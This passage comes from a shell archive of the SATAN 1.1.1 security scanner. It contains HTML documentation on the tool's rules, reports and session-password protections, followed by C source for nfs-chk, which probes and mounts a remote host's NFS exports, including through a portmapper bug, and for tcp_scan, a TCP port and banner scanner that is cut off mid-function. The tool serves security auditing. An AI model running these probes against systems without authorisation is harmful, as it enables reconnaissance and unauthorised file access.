Xscanned at a sufficient level, SATAN will attempt to determine if the
Xhost runs anonymous FTP, and if the FTP home directory is writable for
Xanonymous users.
X
X<p><dt><a href="satan.rules.html#hosttype">rules/hosttype</a>
X
X<dd>Rules that deduce the system class (example: DEC HP SUN) and, where
Xpossible, the operating system release version, from telnet, ftp and
Xother banners.
X
X<p><dt><a href="satan.rules.html#facts">rules/facts</a>
X
X<dd>Rules that deduce potential vulnerabilities. For example, several
Xversions of the FTP or sendmail daemons are known to have problems.
XDaemon versions can be recognized by their greeting banners.
X
X<p><dt><a href="satan.rules.html#services">rules/services</a>
X
X<dd>Rules that translate cryptic daemon banners and/or network port
Xnumbers to more user-friendly names such as <i>WWW server,</i> or
X<i>diskless NFS client</i>.
X
X<p><dt><a href="satan.rules.html#trust">rules/trust</a>
X
X<dd>Like the services rules, these rules help SATAN to classify the
Xdata that was collected by the tools on NFS service, DNS, NIS, and
Xother cases of trust.
X
X<p><dt><a href="satan.rules.html#drop">rules/drop</a>
X
X<dd>What data-collection tool output SATAN should ignore. This can be
Xused to shut up SATAN about things that you do not care about.
XImplemented by the <i>drop_fact.pl</i> module.
X
X</dl>
X
XApplication of these rules in real time, to each tool output record,
Xand within the context of all information that has been collected
Xsofar, offers an amazing potential that we are only beginning to
Xunderstand.
X
X<h3><a name="report-analysis">Report and Analysis</a></h3>
X
XWhen SATAN scans a network with hundreds or thousands of hosts, it can
Xcollect a tremendous amount of information. As we have found, it does
Xnot make much sense to simply present all that information as huge
Xtables. You need the power of hypertext technology, combined with some
Xunusual implementation techniques to generate a dynamic hyperspace on
Xthe fly.
X
X<p>
X
XWith a minimal amount of effort (at least, by you; your computer may
Xdisagree), SATAN allows you to navigate though your networks. You can
Xbreak down the information according to:
X
X<ul>
X
X<li>Domain or subnet,
X
X<li>Network service,
X
X<li>System type or operating system release,
X
X<li>Trust relationships,
X
X<li>Vulnerability type, danger level, or count.
X
X</ul>
X
XBreakdowns by combinations of these properties are also possible.
XSATAN's reporting capabilities makes it relatively easy to find out,
Xfor example:
X
X<ul>
X
X<li>What subnets have diskless workstations,
X
X<li>What hosts offer anonymous FTP,
X
X<li>Who runs Linux or FreeBSD on their PC,
X
X<li>What unregistered (no DNS hostname) hosts are attached to your network.
X

X</ul>
X
X<p>
X

XQuestions like these can be answered with only a few mouse clicks.
XPrinting a report is a matter of pressing the <i>print</i> button of
Xyour favourite hypertext viewer.
X

X<hr>
X<a href="satan_reference.html"> Back to the Reference TOC/Index</a>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 13689 -ne `wc -c <'satan-1.1.1/html/docs/the_main_parts.html'`; then
echo shar: \"'satan-1.1.1/html/docs/the_main_parts.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/docs/the_main_parts.html'
fi
if test -f 'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html'\"
else
echo shar: Extracting \"'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html'\" $6031 characters$
sed "s/^X//" >'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html' <<'END_OF_FILE'
X<HTML>
X<HEAD>
X<title>SATAN Password Disclosure</title>

X<LINK REV="made" HREF="mailto:sa...@fish.com">
X</HEAD>
X<BODY>
X

X<H1> <IMG SRC="../../images/satan.gif">SATAN Password Disclosure</H1>
X
X<HR>
X
X<H3>Summary</H3>
X
XSATAN password disclosure via flawed HTML clients or environmental problems
X
X<H3>Impact</H3>
X
XUnauthorized users may execute commands through SATAN
X
X<H3>Background</H3>
X
XBy default, SATAN runs as a custom HTML (hypertext markup language)
Xserver, executing requests from a user-provided HTML browser, or client
Xprogram. Examples of common HTML clients are <i>Netscape, NCSA
XMosaic</i> and <i>Lynx</i>.
X
X<p>
X
XAn HTML client request is nothing but a network message, and network
Xmessages may be sent by any user on the network. To defend itself
Xagainst requests from unauthorized users, SATAN takes the
Xfollowing precautions:
X
X<ul>
X
X<li>SATAN generates a <i>session key</i>, to be used as a secret
Xpassword, each time it starts up an HTML client. The session key is in
Xthe form of a 32-byte quasi-random number. The number is called
X<i>quasi-random</i> because it is impossible to generate real random
Xnumbers using only software.
X
X<p>
X
X<li>SATAN creates HTML files with the secret password embedded in
XURL (uniform resource locator) links. The HTML file access permissions
Xare restricted to the owner of the SATAN process (and the superuser).
X
X<p>
X
X<li>SATAN rejects HTML requests whose URL does not contain the current
XSATAN password. This requirement prevents access by unauthorized
Xclients, provided that the current SATAN password is kept secret.
X
X</ul>
X
XThe protection scheme used by SATAN is in essence the same as the
Xscheme used by many implementations of the X Window system: MIT magic
Xcookies. These secrets are normally kept in the user's home directory,
Xin a file called <i>.Xauthority</i>. Before it is granted access to the
Xscreen, keyboard and mouse, an X client program needs to prove that it
Xis authorized, by handing over the correct magic cookie. This
Xrequirement prevents unauthorized access, provided that the magic
Xcookie information is kept secret.
X
X<H3>The problem</H3>
X
XIt is important that the current SATAN password is kept secret. When
Xthe password leaks out, unauthorized users can send commands to the
XSATAN HTML server where the commands will be executed with the
Xprivileges of the SATAN process.
X
X<p>
X
XNote that SATAN generates a new password <i>everytime</i> you start it
Xup under an HTML client, so if you are suspicious, simply restart
Xthe program.
X
X<p>
X
XSATAN never sends its current password over the network. However, the
Xpassword, or parts of it, may be disclosed due to flaws in HTML clients
Xor due to weak protection of the environment that SATAN is running in.
XOne possible scenario for disclosure is:
X
X<ul>
X
X<li>When the user selects other HTML servers from within a SATAN
Xsession, some HTML client programs (<i>Netscape</i> and <i>Lynx</i>)
Xdisclose the current SATAN URL, including SATAN password information.
XThe intention of this feature is to help service providers find out the
Xstructure of the world-wide web. However, the feature can also reveal
Xconfidential information. With version 1.1 and later, SATAN displays a
Xwarning when the HTML client program exhibits this questionable (i.e.
Xstupid) feature.
X
X</ul>
X
XOther scenarios for SATAN password disclosure are discussed in the
Xnext section, as part of a list of counter measures.
X
X<H3>Preventing SATAN password disclosure</H3>
X
XThe security of SATAN is highly dependent on the security of environment
Xthat it runs in. In the case of an X Window environment:
X
X<ul>
X
X<li>Avoid using the <i>xhost</i> mechanism, but use <i>xauth</i> and
XMIT magic cookies or better. Otherwise, unauthorized users can see and
Xmanipulate everything that happens with the screen, keyboard and
Xmouse. Of course, this can also be a problem when you are not
Xrunning the SATAN program at all.
X
X</ul>
X
XSteps that can help to keep the X magic cookie information secret:
X
X<ul>
X
X<li>Avoid sharing your home directory, including <i>.Xauthority</i>
Xfile, with other hosts. Otherwise, X magic cookie information may be
Xcaptured from the network while the X software accesses that file, so
Xthat unauthorized users can take over the screen, keyboard and mouse.
X
X<p>
X
X<li>Avoid running X applications with output to a remote display.
XOtherwise, X magic cookie information can be captured from the network
Xwhile X clients connect to the remote display, so that unauthorized
Xusers can take over the screen, keyboard and mouse.
X
X</ul>
X
XFinally, steps that can help to keep the current SATAN password
Xsecret:
X
X<ul>
X
X<li>Avoid sharing the SATAN directories with other hosts. Otherwise,
XSATAN password information may be captured from the network while the
XHTML software accesses passworded files, so that unauthorized users can
Xtake over the SATAN HTML server.
X
X<p>
X
X<li>Avoid running SATAN with output to a remote display. Otherwise,
XSATAN password information can be captured from the network while URL
Xinformation is shown on the remote display, so that unauthorized users can
Xtake over the SATAN HTML server.
X
X</ul>
X
X<H3>Additional SATAN defenses</H3>
X
XThe SATAN software spends a lot of effort to protect your computer and
Xdata against password disclosure. With version 1.1 and later, SATAN
Xeven attempts to protect you <i>after</i> the password has fallen into
Xthe hands of unauthorized users:
X
X<ul>
X
X<li> SATAN displays a warning and advises the user to not contact other
XHTML servers from within a SATAN session, when it finds that the HTML
Xclient program reveals SATAN password information as part of parent URL
Xinformation.
X
X<p>
X
X<li>SATAN rejects requests that appear to come from hosts other than
Xthe one it is running on, that refer to resources outside its own HTML
Xtree, or that contain unexpected data.
X
X<p>
X
X<li>SATAN terminates with a warning when it finds a valid SATAN
Xpassword in an illegal request: SATAN assumes the password has fallen
Xinto the hands of unauthorized users and assumes the worst.
X
X</ul>
X

X</BODY>
X</HTML>
END_OF_FILE

if test 6031 -ne `wc -c <'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html'`; then
echo shar: \"'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/html/tutorials/vulnerability/SATAN_password_disclosure.html'
fi
if test -f 'satan-1.1.1/src/fping/AUTHOR' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/fping/AUTHOR'\"
else
echo shar: Extracting \"'satan-1.1.1/src/fping/AUTHOR'\" $78 characters$
sed "s/^X//" >'satan-1.1.1/src/fping/AUTHOR' <<'END_OF_FILE'
X
XBob Morgan, mor...@networking.stanford.edu, is currently maintaining fping.
X
END_OF_FILE
if test 78 -ne `wc -c <'satan-1.1.1/src/fping/AUTHOR'`; then
echo shar: \"'satan-1.1.1/src/fping/AUTHOR'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/fping/AUTHOR'
fi
if test -f 'satan-1.1.1/src/nfs-chk/nfs-chk.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/nfs-chk/nfs-chk.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/nfs-chk/nfs-chk.c'\" $10404 characters$
sed "s/^X//" >'satan-1.1.1/src/nfs-chk/nfs-chk.c' <<'END_OF_FILE'
X /*
X * nfs-chk - report on nfs file accessibility
X *
X * Tries to mount via the portmapper.
X *
X * Tries to mount as unprivileged user.
X *
X * Needs to be run by superuser.

X *
X * Author: Wietse Venema.
X */
X

X#define PORTMAP
X
X#include <sys/types.h>
X#include <sys/socket.h>
X#include <sys/time.h>
X#include <string.h>

X#include <stdlib.h>
X#include <unistd.h>
X#include <stdio.h>

X#include <errno.h>
X#include <netdb.h>
X#include <netinet/in.h>
X#include <arpa/inet.h>
X#include <rpc/rpc.h>
X#include <rpc/pmap_prot.h>
X
X#ifdef TIRPC
X#include <sys/tiuser.h>
X#include <stropts.h>
X#endif
X
X#ifndef INADDR_NONE
X#define INADDR_NONE (-1) /* XXX should be 0xffffffff */
X#endif
X
Xextern int getopt();
Xextern int optind;
Xextern char *optarg;
X
X#include "mount.h"
X#include "nfs_prot.h"
X
Xstatic struct timeval timeout = {5, 0};
Xstatic int verbose = 0;
Xstatic int portmap = 1;
Xstatic char *progname;
X
X#define debug if (verbose) printf
X
X#define UNPRIVILEGED_PORT 0
X#define PRIVILEGED_PORT 1
X
Xstruct hostinfo {
X char *hostname;
X struct sockaddr_in sin;
X CLIENT *mountd_clnt; /* privileged mount */
X CLIENT *nfsd_clnt; /* privileged nfs */
X CLIENT *umountd_clnt; /* unprivileged mount */
X CLIENT *unfsd_clnt; /* privileged nfs */
X};
X
X/* usage - explain and terminate */
X
Xvoid usage()
X{
X fprintf(stderr, "Usage: %s [-p] [-v] [-t timeout] hostname\n", progname);
X exit(1);
X}
X
X/* perrorexit - print error and exit */
X
Xvoid perrorexit(text)
Xchar *text;
X{
X perror(text);
X exit(1);
X}
X
X/* clnt_pcreateerrorexit - print error and exit */
X
Xvoid clnt_pcreateerrorexit(text)
Xchar *text;
X{
X clnt_pcreateerror(text);
X exit(1);
X}
X
X/* clnt_perrorexit - print error and exit */
X
Xvoid clnt_perrorexit(client, text)
XCLIENT *client;
Xchar *text;
X{
X clnt_perror(client, text);
X exit(1);
X}
X
X/* nfs_perror - print nfs error */
X
Xvoid nfs_perror(status, text)
Xint status;
Xchar *text;
X{
X errno = status; /* XXX */
X perror(text);
X}
X
X/* nfs_perrorexit - print nfs error and exit */
X
Xvoid nfs_perrorexit(status, text)
Xint status;
Xchar *text;
X{
X errno = status; /* XXX */
X perrorexit(text);
X}
X
X/* reserved_port - allocate a privileged port or bust */
X
Xint reserved_port(type, protocol)
Xint type;
Xint protocol;
X{
X struct sockaddr_in sin;
X int port;
X int sock;
X
X if ((sock = socket(AF_INET, type, protocol)) < 0)
X perrorexit("nfs-chk: socket");

X memset((char *) &sin, 0, sizeof(sin));

X sin.sin_family = AF_INET;
X sin.sin_addr.s_addr = 0;
X
X for (port = IPPORT_RESERVED - 1; port > IPPORT_RESERVED / 2; port--) {
X sin.sin_port = htons((u_short) port);
X if (bind(sock, (struct sockaddr *) & sin, sizeof(sin)) >= 0) {
X debug("Using privileged port %d\n", port);
X return (sock);
X }
X if (errno != EADDRINUSE && errno != EADDRNOTAVAIL)
X break;
X }
X perrorexit("nfs-chk: bind privileged port");
X}
X
X/* make_client - create client handle to talk to rpc server */
X
XCLIENT *make_client(addr, program, version, privileged)
Xstruct sockaddr_in *addr;
Xu_long program;
Xu_long version;
Xint privileged;
X{
X CLIENT *client;
X int sock;
X AUTH_GID_T nul = 0;
X
X#if 0
X debug("Trying to set up TCP client handle\n");
X addr->sin_port = 0;
X if (privileged) {
X sock = reserved_port(SOCK_STREAM, IPPROTO_TCP);
X } else {
X sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
X }
X if (sock < 0)
X perrorexit("nfs-chk: socket");
X#ifdef TIRPC
X ioctl(sock, I_PUSH, "timod");
X#endif
X if (client = clnttcp_create(addr, program, version, &sock, 0, 0)) {
X connect(sock, (struct sockaddr *) addr, sizeof(*addr));
X client->cl_auth = authunix_create("", 0, 0, 1, &nul);
X return (client);
X }
X close(sock);
X#endif
X
X debug("Trying to set up UDP client handle\n");
X addr->sin_port = 0;
X if (privileged) {
X sock = reserved_port(SOCK_DGRAM, IPPROTO_UDP);
X } else {
X sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
X }
X if (sock < 0)
X perrorexit("nfs-chk: socket");
X#ifdef TIRPC
X ioctl(sock, I_PUSH, "timod");
X#endif
X if (client = clntudp_create(addr, program, version, timeout, &sock)) {
X client->cl_auth = authunix_create("", 0, 0, 1, &nul);
X return (client);
X }
X close(sock);

X return (0);
X}
X

X/* portmap_mount - mount via portmapper */
X
Xfhstatus *portmap_mount(path, addr)
Xchar *path;
Xstruct sockaddr_in *addr;
X{
X static fhstatus mount_status;
X u_long port;
X
X memset((char *) &mount_status, 0, sizeof(mount_status));
X addr->sin_port = htons(PMAPPORT);
X
X if (pmap_rmtcall(addr, MOUNTPROG, MOUNTVERS, MOUNTPROC_MNT,
X xdr_dirpath, &path,
X xdr_fhstatus, &mount_status,
X timeout, &port) == 0) {
X return (&mount_status);

X }
X return (0);
X}
X

X/* print_attributes - display file modes */
X
Xvoid print_attributes(ap, path)
Xfattr *ap;
Xchar *path;
X{
X char *cp;
X time_t seconds;
X
X switch (ap->type) {
X case NFREG:
X putchar('-');
X break;
X case NFDIR:
X putchar('d');
X break;
X default:
X putchar('?');
X break;
X }
X putchar((ap->mode & 0400) ? 'r' : '-');
X putchar((ap->mode & 0200) ? 'w' : '-');
X putchar((ap->mode & 0100) ?
X ((ap->mode & 04000) ? 's' : 'x') :
X ((ap->mode & 04000) ? 'S' : '-'));
X putchar((ap->mode & 040) ? 'r' : '-');
X putchar((ap->mode & 020) ? 'w' : '-');
X putchar((ap->mode & 010) ?
X ((ap->mode & 02000) ? 's' : 'x') :
X ((ap->mode & 02000) ? 'S' : '-'));
X putchar((ap->mode & 04) ? 'r' : '-');
X putchar((ap->mode & 02) ? 'w' : '-');
X putchar((ap->mode & 01) ?
X ((ap->mode & 01000) ? 't' : 'x') :
X ((ap->mode & 01000) ? 'T' : '-'));
X seconds = ap->ctime.seconds;
X cp = ctime(&seconds);
X printf("%3d %8d %5d %9d %-7.7s %-4.4s %s\n",
X ap->nlink, ap->uid, ap->gid, ap->size, cp + 4, cp + 20, path);
X}
X
X/* show_mount_point - display mount point info */
X
Xint show_mount_point(path, mount_status, client)
Xchar *path;
Xfhstatus *mount_status;
XCLIENT *client;
X{
X attrstat *attr_status;
X
X if ((attr_status = nfsproc_getattr_2(mount_status->fhstatus_u.fhs_fhandle,
X client)) == 0) {
X clnt_perror(client, path);
X return (0);
X } else if (attr_status->status != NFS_OK) {
X nfs_perror(attr_status->status, path);
X return (0);
X } else {
X print_attributes(&(attr_status->attrstat_u.attributes), path);
X return (1);
X }
X}
X
X/* examine_filesystem - examine exported file system */
X
Xvoid examine_filesystem(h, path, client_info)
Xstruct hostinfo *h;
Xchar *path;
Xgroups client_info;
X{
X fhstatus *mount_status;
X
X if (client_info == 0) {
X printf("Warning: host %s exports %s to the world\n", h->hostname, path);
X } else {
X printf("Examining: %s:%s\n", h->hostname, path);
X }
X
X if (portmap) {
X debug("Trying to mount %s via portmapper\n", path);
X mount_status = portmap_mount(path, &h->sin);
X if (mount_status != 0 && mount_status->fhs_status == NFS_OK) {
X if (show_mount_point(path, mount_status, h->nfsd_clnt))
X printf("Warning: host %s exports %s via portmapper\n",
X h->hostname, path);
X debug("Unmounting: %s\n", path);
X mountproc_umnt_1(&path, h->mountd_clnt);
X }
X }
X debug("Trying to mount %s via mountd\n", path);
X mount_status = mountproc_mnt_1(&path, h->mountd_clnt);
X if (mount_status != 0 && mount_status->fhs_status == NFS_OK) {
X if (show_mount_point(path, mount_status, h->nfsd_clnt))
X printf("Mounted: %s via mount daemon\n", path);
X debug("Unmounting: %s\n", path);
X mountproc_umnt_1(&path, h->mountd_clnt);
X
X mount_status = mountproc_mnt_1(&path, h->umountd_clnt);
X if (mount_status != 0 && mount_status->fhs_status == NFS_OK) {
X if (show_mount_point(path, mount_status, h->unfsd_clnt))
X printf("Warning: host %s exports %s to unprivileged programs\n",
X h->hostname, path);
X debug("Unmounting: %s\n", path);
X mountproc_umnt_1(&path, h->umountd_clnt);
X }
X }
X}
X
X/* find_host - look up host information */
X
Xvoid find_host(h)
Xstruct hostinfo *h;
X{
X struct hostent *hp;
X long addr;
X
X /*
X * Look up IP address information. XXX with multi-homed hosts, should try
X * all addresses until we succeed.
X */
X
X memset((char *) &h->sin, 0, sizeof(h->sin));
X h->sin.sin_family = AF_INET;
X
X if ((addr = inet_addr(h->hostname)) != INADDR_NONE) {
X h->sin.sin_addr.s_addr = addr;
X } else if ((hp = gethostbyname(h->hostname)) == 0) {
X fprintf(stderr, "%s: host not found: %s\n", progname, h->hostname);
X exit(1);
X } else {
X memcpy((char *) &h->sin.sin_addr, hp->h_addr, sizeof(h->sin));
X }
X
X /*
X * Look up mountd and nfsd information.
X */
X
X debug("Setting up mountd clients\n");
X if ((h->mountd_clnt =
X make_client(&h->sin, MOUNTPROG, MOUNTVERS, PRIVILEGED_PORT)) == 0)
X clnt_pcreateerrorexit("privileged mountd client create");
X if ((h->umountd_clnt =
X make_client(&h->sin, MOUNTPROG, MOUNTVERS, UNPRIVILEGED_PORT)) == 0)
X clnt_pcreateerrorexit("unprivileged mountd client create");
X
X debug("Setting up nfsd clients\n");
X if ((h->nfsd_clnt =
X make_client(&h->sin, NFS_PROGRAM, NFS_VERSION, PRIVILEGED_PORT)) == 0)
X clnt_pcreateerrorexit("privileged nfsd client create");
X if ((h->unfsd_clnt =
X make_client(&h->sin, NFS_PROGRAM, NFS_VERSION, UNPRIVILEGED_PORT)) == 0)
X clnt_pcreateerrorexit("unprivileged nfsd client create");
X}

X
Xmain(argc, argv)
Xint argc;
Xchar *argv[];
X{

X exports exp;
X exports *exp_list;
X int opt;
X struct hostinfo h;

X
X progname = argv[0];
X

X /*
X * Parse JCL.
X */
X
X while ((opt = getopt(argc, argv, "pvt:")) != EOF) {
X switch (opt) {
X case 'p': /* don't try portmap bug */
X portmap = 0;
X break;
X case 'v': /* turn on verbose mode */

X verbose = 1;
X break;

X case 't': /* change timeout */
X timeout.tv_sec = atoi(optarg);
X break;
X default:
X usage();

X /* NOTREACHED */
X }

X }
X
X if (argc != optind + 1)
X usage();
X h.hostname = argv[optind];
X
X /*
X * Look up host information. Only the name is stolen from RJN.
X */
X
X find_host(&h);
X
X /*
X * For each exported file system, report if we can access it. By way of
X * proof, show an "ls -l" like listing.
X */
X
X debug("Retrieving exports list\n");
X if ((exp_list = mountproc_export_1(NULL, h.mountd_clnt)) == 0)
X clnt_perrorexit(h.mountd_clnt, "mount export list");
X for (exp = *exp_list; exp; exp = exp->ex_next) {
X examine_filesystem(&h, exp->ex_dir, exp->ex_groups);
X }
X}
END_OF_FILE
if test 10404 -ne `wc -c <'satan-1.1.1/src/nfs-chk/nfs-chk.c'`; then
echo shar: \"'satan-1.1.1/src/nfs-chk/nfs-chk.c'\" unpacked with wrong size!
fi
# end of 'satan-1.1.1/src/nfs-chk/nfs-chk.c'
fi
if test -f 'satan-1.1.1/src/port_scan/tcp_scan.c' -a "${1}" != "-c" ; then
echo shar: Will not clobber existing file \"'satan-1.1.1/src/port_scan/tcp_scan.c'\"
else
echo shar: Extracting \"'satan-1.1.1/src/port_scan/tcp_scan.c'\" $14083 characters$
sed "s/^X//" >'satan-1.1.1/src/port_scan/tcp_scan.c' <<'END_OF_FILE'
X /*
X * tcp_scan - determine available tcp services, optionally collect banners
X * and detect telnet options

X *
X * Author: Wietse Venema.
X */
X
X#include <sys/types.h>
X#include <sys/param.h>

X#include <sys/time.h>
X#include <sys/socket.h>
X
X#include <netinet/in.h>
X#include <netinet/in_systm.h>
X#include <netinet/ip.h>
X#include <netinet/ip_icmp.h>
X#include <netinet/tcp.h>
X
X#include <arpa/telnet.h>
X
X#include <stdio.h>
X#include <signal.h>
X#include <netdb.h>
X#include <string.h>
X#include <errno.h>
X
Xextern int errno;

Xextern char *optarg;
Xextern int optind;
X
X#ifndef __STDC__
Xextern char *strerror();
X#endif
X
X#define offsetof(t,m) (size_t)(&(((t *)0)->m))
X

X#ifndef IPPORT_TELNET
X#define IPPORT_TELNET 23
X#endif

X
X#ifndef FD_SET
X#include <sys/select.h>
X#endif
X
X#include "lib.h"
X

X#define BANNER_LENGTH 2048 /* upper bound on banner info */
X#define BANNER_TIME 10 /* time for host to send banner */
X#define BANNER_IDLE 1 /* delay after last banner info */

X
X#define YES 1
X#define NO 0
X

X#define WAIT 1
X#define NOWAIT 0
X
Xint verbose; /* default silent mode */
Xint banner_time = BANNER_TIME; /* banner timeout */

Xint open_file_limit; /* max nr of open files */

Xint load_limit; /* max nr of open sockets */
X
Xstruct timeval now; /* banner_info last update time */
Xfd_set write_socket_mask; /* sockets with connect() in progress */
Xfd_set read_socket_mask; /* sockets with connect() finished */

Xint ports_busy; /* number of open sockets */

Xint ports_done; /* number of finished sockets */
Xint max_sock; /* max socket file descriptor */
Xint want_err; /* want good/bad news */
Xint show_all; /* report all ports */
X
Xint *socket_to_port; /* socket to port number */
X
Xtypedef struct {
X unsigned char *buf; /* banner information or null */
X int count; /* amount of banner received sofar */
X int flags; /* see below */
X struct timeval connect_time; /* when connect() finished */
X struct timeval read_time; /* time of last banner update */
X} BANNER_INFO;
X
XBANNER_INFO *banner_info = 0;
X
X#define F_TELNET (1<<0) /* telnet options seen */
X
Xint icmp_sock; /* for unreachable reports */
Xstatic struct sockaddr_in sin; /* remote endpoint info */
X
Xstatic char *send_string; /* string to send */
Xint response_time; /* need some response */
X
X#define NEW(type, count) (type *) mymalloc((count) * sizeof(type))

X
X#define time_since(t) (now.tv_sec - t.tv_sec + 1e-6 * (now.tv_usec - t.tv_usec))

X
X/* main - command-line interface */
X
Xmain(argc, argv)
Xint argc;
Xchar *argv[];
X{
X int c;
X struct protoent *pe;
X char **ports;
X
X progname = argv[0];
X if (geteuid())
X error("This program needs root privileges");
X
X open_file_limit = open_limit();

X load_limit = open_file_limit - 10;
X
X while ((c = getopt(argc, argv, "abl:s:t:uUvw:")) != EOF) {

X switch (c) {
X case 'a':
X show_all = 1;
X break;

X case 'b':
X if (banner_info == 0)
X banner_info = NEW(BANNER_INFO, open_file_limit);

X break;
X case 'l':

X if ((load_limit = atoi(optarg)) <= 0)

X usage("invalid load limit");

X if (load_limit > open_file_limit - 10)
X load_limit = open_file_limit - 10;
X break;
X case 's':
X send_string = optarg;
X signal(SIGPIPE, SIG_IGN);
X break;
X case 't':
X if ((response_time = atoi(optarg)) <= 0)
X usage("invalid timeout");
X break;

X case 'u':
X want_err = EHOSTUNREACH;
X break;
X case 'U':
X want_err = ~EHOSTUNREACH;
X break;
X case 'v':
X verbose = 1;
X break;

X case 'w':
X if ((banner_time = atoi(optarg)) <= 0)
X usage("invalid timeout");
X break;
X default:

X usage((char *) 0);
X break;
X }
X }
X argc -= (optind - 1);
X argv += (optind - 1);
X if (argc < 3)

X usage("missing host or service argument");
X
X socket_to_port = NEW(int, open_file_limit);
X
X FD_ZERO(&write_socket_mask);
X FD_ZERO(&read_socket_mask);
X ports_busy = 0;
X
X /*
X * Allocate the socket to read ICMP replies.
X */

X if ((pe = getprotobyname("icmp")) == 0)
X error("icmp: unknown protocol");
X if ((icmp_sock = socket(AF_INET, SOCK_RAW, pe->p_proto)) < 0)
X error("icmp socket: %m");

X FD_SET(icmp_sock, &read_socket_mask);
X
X /*
X * Scan the ports.

X */
X memset((char *) &sin, 0, sizeof(sin));
X sin.sin_addr = find_addr(argv[1]);
X sin.sin_family = AF_INET;
X

X if (response_time > 0)
X alarm(response_time);
X

X for (ports = argv + 2; *ports; ports++)
X scan_ports(*ports);

X while (ports_busy > 0)
X monitor_ports(WAIT);

X
X return (0);
X}
X
X/* usage - explain command syntax */
X
Xusage(why)
Xchar *why;
X{
X if (why)
X remark(why);

X error("usage: %s [-abuU] [-l load] [-w time] host ports...", progname);

X}
X
X/* scan_ports - scan ranges of ports */
X
Xscan_ports(service)
Xchar *service;
X{
X char *cp;
X int min_port;
X int max_port;
X int port;

X int sock;

X
X /*
X * Translate service argument to range of port numbers.
X */
X if ((cp = strchr(service, '-')) != 0) {
X *cp++ = 0;

X min_port = (service[0] ? ntohs(find_port(service, "tcp")) : 1);
X max_port = (cp[0] ? ntohs(find_port(cp, "tcp")) : 65535);
X } else {
X min_port = max_port = ntohs(find_port(service, "tcp"));
X }
X
X /*
X * Iterate over each port in the given range. Try to keep as many sockets
X * open at the same time as possible. Gradually increase the number of
X * probes so that they will be spread in time.
X */

X for (port = min_port; port <= max_port; port++) {

X if (verbose)
X remark("connecting to port %d", port);
X sin.sin_port = htons(port);
X while ((sock = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
X remark("socket: %m");
X monitor_ports(WAIT);
X }
X add_socket(sock, port);
X non_blocking(sock, YES);
X if (connect(sock, (struct sockaddr *) & sin, sizeof(sin)) < 0
X && errno != EINPROGRESS) {
X report_and_drop_socket(sock, errno);
X continue;
X }
X if (ports_busy < load_limit && ports_busy < ports_done) {
X monitor_ports(NOWAIT);
X } else {
X while (ports_busy >= load_limit || ports_busy >= ports_done)
X monitor_ports(WAIT);
X }
X }
X}
X

X/* monitor_ports - watch for socket activity */
X

Xmonitor_ports(wait)
Xint wait;
X{
X fd_set read_mask;
X fd_set write_mask;
X static struct timeval waitsome = {1, 1,};
X static struct timeval waitnot = {0, 0,};
X int sock;
X char ch;
X
X if (banner_info == 0) {
X
X /*
X * When a connect() completes, report the socket and get rid of it.
X */
X write_mask = write_socket_mask;
X read_mask = read_socket_mask;
X if (select(max_sock + 1, &read_mask, &write_mask, (fd_set *) 0,
X wait ? (struct timeval *) 0 : &waitnot) < 0)

X error("select: %m");

X if (FD_ISSET(icmp_sock, &read_mask))
X receive_icmp(icmp_sock);

X for (sock = 0; ports_busy > 0 && sock <= max_sock; sock++) {
X if (FD_ISSET(sock, &write_mask)) {
X if (read(sock, &ch, 1) < 0 && errno != EWOULDBLOCK && errno != EAGAIN) {
X report_and_drop_socket(sock, errno);
X } else {
X report_and_drop_socket(sock, 0);
X }
X }
X }

X } else {
X
X /*

X * When a connect() completes, try to receive some data within
X * banner_time seconds. Assume we have received all banner data when
X * a socket stops sending for BANNER_IDLE seconds.
X */
X write_mask = write_socket_mask;
X read_mask = read_socket_mask;
X if (select(max_sock + 1, &read_mask, &write_mask, (fd_set *) 0,
X wait ? &waitsome : &waitnot) < 0)

X error("select: %m");

X if (FD_ISSET(icmp_sock, &read_mask))
X receive_icmp(icmp_sock);

X gettimeofday(&now, (struct timezone *) 0);

X for (sock = 0; ports_busy > 0 && sock <= max_sock; sock++) {
X if (sock == icmp_sock)
X continue;
X if (FD_ISSET(sock, &write_mask)) {
X FD_CLR(sock, &write_socket_mask);
X FD_SET(sock, &read_socket_mask);
X banner_info[sock].connect_time = now;
X if (send_string)
X do_send_string(sock);
X } else if (FD_ISSET(sock, &read_mask)) {
X switch (read_socket(sock)) {
X case -1:
X if (errno != EWOULDBLOCK && errno != EAGAIN)
X report_and_drop_socket(sock, errno);
X break;
X case 0:
X report_and_drop_socket(sock, 0);
X break;
X }
X } else if (FD_ISSET(sock, &read_socket_mask)) {
X if (time_since_connect(sock) > banner_time
X || time_since_read(sock) > BANNER_IDLE)
X report_and_drop_socket(sock, 0);

X }
X }
X }
X}
X

X/* read_socket - read data from server */
X
Xread_socket(sock)
Xint sock;
X{
X BANNER_INFO *bp = banner_info + sock;
X unsigned char *cp;
X int len;
X int count;
X
X if (bp->buf == 0)
X bp->buf = (unsigned char *) mymalloc(BANNER_LENGTH);
X cp = bp->buf + bp->count;
X len = BANNER_LENGTH - bp->count;
X
X if (len == 0)
X return (0);
X
X bp->read_time = now;
X
X /*
X * Process banners with one-character reads so that we can detect telnet
X * options.
X */
X
X if ((count = read(sock, cp, 1)) == 1) {
X if (cp[0] == IAC) {
X if ((count = read(sock, cp + 1, 2)) == 2) {
X if (cp[1] == WILL || cp[1] == WONT) {
X cp[1] = DONT;
X bp->flags |= F_TELNET;
X write(sock, cp, 3);
X } else if (cp[1] == DO || cp[1] == DONT) {
X cp[1] = WONT;
X bp->flags |= F_TELNET;
X write(sock, cp, 3);
X }
X }
